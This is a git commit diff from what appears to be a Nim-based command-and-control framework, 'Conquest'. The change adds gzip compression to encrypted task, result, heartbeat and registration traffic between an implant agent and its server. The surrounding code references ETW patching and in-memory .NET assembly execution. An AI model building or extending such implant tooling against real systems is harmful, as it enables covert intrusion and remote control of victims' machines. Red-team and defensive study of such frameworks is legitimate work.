Implemented compression of the network packet bodies.

2025-09-13 15:18:46 +02:00
parent b7b9114258
commit c6bbef8520
7 changed files with 48 additions and 25 deletions
--- a/conquest.nimble
+++ b/conquest.nimble
@@ -29,3 +29,4 @@ requires "prologue >= 0.6.6"
 requires "winim >= 3.9.4"
 requires "ptr_math >= 0.3.0"
 requires "imguin >= 1.92.2.0"
+requires "zippy >= 0.10.16"
--- a/src/agent/core/clr.nim
+++ b/src/agent/core/clr.nim
@@ -34,7 +34,6 @@ proc etwPatch(pThreadCtx: PCONTEXT) =
    Arguments: 
    - assemblyBytes: Serialized .NET assembly 
    - arguments: seq[string] of arguments that should be passed to the function
-    Returns: CLR Version and assembly output
 ]#
 proc dotnetInlineExecuteGetOutput*(assemblyBytes: seq[byte], arguments: seq[string] = @[]): tuple[assembly, output: string] = 

--- a/src/agent/protocol/heartbeat.nim
+++ b/src/agent/protocol/heartbeat.nim
@@ -1,5 +1,4 @@
-import times 
-
+import times, zippy
 import ../../common/[types, serialize, sequence, utils, crypto]

 proc createHeartbeat*(ctx: AgentCtx): Heartbeat = 
@@ -31,8 +30,11 @@ proc serializeHeartbeat*(ctx: AgentCtx, request: var Heartbeat): seq[byte] =
    let body = packer.pack()
    packer.reset()

+    # Compress payload body
+    let compressedPayload = compress(body, BestCompression, dfGzip)
+
    # Encrypt check-in / heartbeat request body 
-    let (encData, gmac) = encrypt(ctx.sessionKey, request.header.iv, body, request.header.seqNr)
+    let (encData, gmac) = encrypt(ctx.sessionKey, request.header.iv, compressedPayload, request.header.seqNr)

    # Set authentication tag (GMAC)
    request.header.gmac = gmac
--- a/src/agent/protocol/registration.nim
+++ b/src/agent/protocol/registration.nim
@@ -1,4 +1,4 @@
-import winim, os, net, strformat, strutils, registry, sugar
+import winim, os, net, strformat, strutils, registry, zippy

 import ../../common/[types, serialize, sequence, crypto, utils]

@@ -241,8 +241,11 @@ proc serializeRegistrationData*(ctx: AgentCtx, data: var AgentRegistrationData):
    let metadata = packer.pack()
    packer.reset()

+    # Compress payload body
+    let compressedPayload = compress(metadata, BestCompression, dfGzip)
+
    # Encrypt metadata
-    let (encData, gmac) = encrypt(ctx.sessionKey, data.header.iv, metadata, data.header.seqNr)
+    let (encData, gmac) = encrypt(ctx.sessionKey, data.header.iv, compressedPayload, data.header.seqNr)

    # Set authentication tag (GMAC)
    data.header.gmac = gmac
--- a/src/agent/protocol/result.nim
+++ b/src/agent/protocol/result.nim
@@ -1,4 +1,4 @@
-import times, sugar
+import times, zippy
 import ../../common/[types, serialize, sequence, crypto, utils]

 proc createTaskResult*(task: Task, status: StatusType, resultType: ResultType, resultData: seq[byte]): TaskResult = 
@@ -44,8 +44,11 @@ proc serializeTaskResult*(ctx: AgentCtx, taskResult: var TaskResult): seq[byte]
    let body = packer.pack()
    packer.reset()

+    # Compress payload 
+    let compressedPayload = compress(body, BestCompression, dfGzip)
+
    # Encrypt result body 
-    let (encData, gmac) = encrypt(ctx.sessionKey, taskResult.header.iv, body, taskResult.header.seqNr)
+    let (encData, gmac) = encrypt(ctx.sessionKey, taskResult.header.iv, compressedPayload, taskResult.header.seqNr)

    # Set authentication tag (GMAC)
    taskResult.header.gmac = gmac
--- a/src/agent/protocol/task.nim
+++ b/src/agent/protocol/task.nim
@@ -1,4 +1,4 @@
-import strutils, tables, json, strformat, sugar
+import strutils, tables, json, strformat, zippy

 import ./result
 import ../../modules/manager
@@ -20,11 +20,14 @@ proc deserializeTask*(ctx: AgentCtx, bytes: seq[byte]): Task =
    validatePacket(header, cast[uint8](MSG_TASK)) 

    # Decrypt payload 
-    let payload = unpacker.getBytes(int(header.size))
-    let decData= validateDecryption(ctx.sessionKey, header.iv, payload, header.seqNr, header)
+    let compressedPayload = unpacker.getBytes(int(header.size))
+    let decData = validateDecryption(ctx.sessionKey, header.iv, compressedPayload, header.seqNr, header)
+
+    # Decompress payload 
+    let payload = uncompress(decData, dfGzip)

    # Deserialize decrypted data
-    unpacker = Unpacker.init(Bytes.toString(decData))
+    unpacker = Unpacker.init(Bytes.toString(payload))

    let 
        taskId = unpacker.getUint32()
--- a/src/server/protocol/packer.nim
+++ b/src/server/protocol/packer.nim
@@ -1,4 +1,4 @@
-import strutils, streams, times, tables
+import strutils, streams, times, tables, zippy
 import ../../common/[types, utils, serialize, sequence, crypto]

 proc serializeTask*(cq: Conquest, task: var Task): seq[byte] = 
@@ -19,14 +19,17 @@ proc serializeTask*(cq: Conquest, task: var Task): seq[byte] =
    let payload = packer.pack() 
    packer.reset()

+    # Compress payload body
+    let compressedPayload = compress(payload, BestCompression, dfGzip)
+
    # Encrypt payload body
-    let (encData, gmac) = encrypt(cq.agents[Uuid.toString(task.header.agentId)].sessionKey, task.header.iv, payload, task.header.seqNr)
+    let (encData, gmac) = encrypt(cq.agents[Uuid.toString(task.header.agentId)].sessionKey, task.header.iv, compressedPayload, task.header.seqNr)

    # Set authentication tag (GMAC)
    task.header.gmac = gmac

    # Serialize header 
-    let header = packer.serializeHeader(task.header, uint32(payload.len))
+    let header = packer.serializeHeader(task.header, uint32(encData.len))

    return header & encData

@@ -40,11 +43,14 @@ proc deserializeTaskResult*(cq: Conquest, resultData: seq[byte]): TaskResult =
    validatePacket(header, cast[uint8](MSG_RESULT)) 

    # Decrypt payload 
-    let payload = unpacker.getBytes(int(header.size))
-    let decData= validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, payload, header.seqNr, header)
+    let compressedPayload = unpacker.getBytes(int(header.size))
+    let decData = validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, compressedPayload, header.seqNr, header)
+
+    # Decompress payload
+    let payload = uncompress(decData, dfGzip)

    # Deserialize decrypted data
-    unpacker = Unpacker.init(Bytes.toString(decData))
+    unpacker = Unpacker.init(Bytes.toString(payload))

    let 
        taskId = unpacker.getUint32()
@@ -82,11 +88,14 @@ proc deserializeNewAgent*(cq: Conquest, data: seq[byte]): Agent =
    let sessionKey = deriveSessionKey(cq.keyPair, agentPublicKey)
    
    # Decrypt payload 
-    let payload = unpacker.getBytes(int(header.size)) 
-    let decData= validateDecryption(sessionKey, header.iv, payload, header.seqNr, header)
+    let compressedPayload = unpacker.getBytes(int(header.size)) 
+    let decData = validateDecryption(sessionKey, header.iv, compressedPayload, header.seqNr, header)
+
+    # Decompress payload
+    let payload = uncompress(decData, dfGzip)

    # Deserialize decrypted data
-    unpacker = Unpacker.init(Bytes.toString(decData))
+    unpacker = Unpacker.init(Bytes.toString(payload))

    let 
        listenerId = unpacker.getUint32()
@@ -128,11 +137,14 @@ proc deserializeHeartbeat*(cq: Conquest, data: seq[byte]): Heartbeat =
    validatePacket(header, cast[uint8](MSG_HEARTBEAT)) 

    # Decrypt payload
-    let payload = unpacker.getBytes(int(header.size))
-    let decData= validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, payload, header.seqNr, header)
+    let compressedPayload = unpacker.getBytes(int(header.size))
+    let decData = validateDecryption(cq.agents[Uuid.toString(header.agentId)].sessionKey, header.iv, compressedPayload, header.seqNr, header)
+
+    # Decompress payload 
+    let payload = uncompress(decData, dfGzip)

    # Deserialize decrypted data
-    unpacker = Unpacker.init(Bytes.toString(decData))
+    unpacker = Unpacker.init(Bytes.toString(payload))

    return Heartbeat(
        header: header,